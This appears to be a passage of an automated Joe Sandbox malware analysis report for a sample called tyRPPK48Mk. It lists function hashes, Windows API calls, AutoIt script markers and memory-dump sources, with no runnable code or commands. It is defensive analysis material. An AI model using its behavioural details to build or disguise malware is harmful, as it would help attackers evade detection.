• Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
• Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
• Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 04938E0D
• ExitProcess.KERNEL32(00000000), ref: 04938E2C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
Similarity
• API ID: Process$CreateExit
• String ID: D
• API String ID: 126409537-2746444292
• Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
• Instruction ID: 2769e685bfcbc2cec81eb697eb66a4840ad2be297d5d481e9e6ae9856be54712
• Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
• Instruction Fuzzy Hash: 7CF0127154024CABDB60EFE0CC49FEE777DBF44705F408918FB4A9A180DB74A6088B61
APIs
• _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _memmove.LIBCMT ref: 00401B57
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @EXITCODE
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2734553683-3436989551
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1794320848-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
APIs
• _malloc.LIBCMT ref: 0043214B
  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• _malloc.LIBCMT ref: 0043215D
• _malloc.LIBCMT ref: 0043216F
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: _malloc$AllocateHeap
• String ID:
• API String ID: 680241177-0
APIs
  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
• _free.LIBCMT ref: 004295A0
  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
• String ID: >>>AUTOIT SCRIPT<<<
• API String ID: 3938964917-2806939583
Strings
• >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _strcat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1765576173-2684727018
APIs
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
• __wsplitpath.LIBCMT ref: 004678F7
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
Similarity
• API ID: ErrorLast__wsplitpath_malloc
• String ID:
• API String ID: 4163294574-0
APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4104443479-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                                                                                                                                                                                                                                                                                                                                                • _strcat.LIBCMT ref: 0040F786
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3199840319-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0040D779
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FreeInfoLibraryParametersSystem
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3403648963-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                                                                                                                                                                                                • __lock_file.LIBCMT ref: 00414A8D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2800547568-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __lock_file.LIBCMT ref: 00415012
                                                                                                                                                                                                                                                                                                                                                                                                                                • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2999321469-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 049386A8: GetFileAttributesW.KERNELBASE(?), ref: 049386B3
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 04938F67
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AttributesCreateDirectoryFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3401506121-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6167f84fd8789eecc1f2067891100837ad7d7966fc0f9d36921b13fb01911f6a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2e61dff733f25ae44bfab86fec3475d9b869c1dda2ecbc9c1790bcfa94ae4cb3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6167f84fd8789eecc1f2067891100837ad7d7966fc0f9d36921b13fb01911f6a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11517431A1120996EF14FFB0C944BEF7379EF98301F0045A9B509E7280EB79AB44CBA5
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4104443479-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00444B34
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _malloc_memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1183979061-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __lock_file
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3031932315-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 049386B3
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
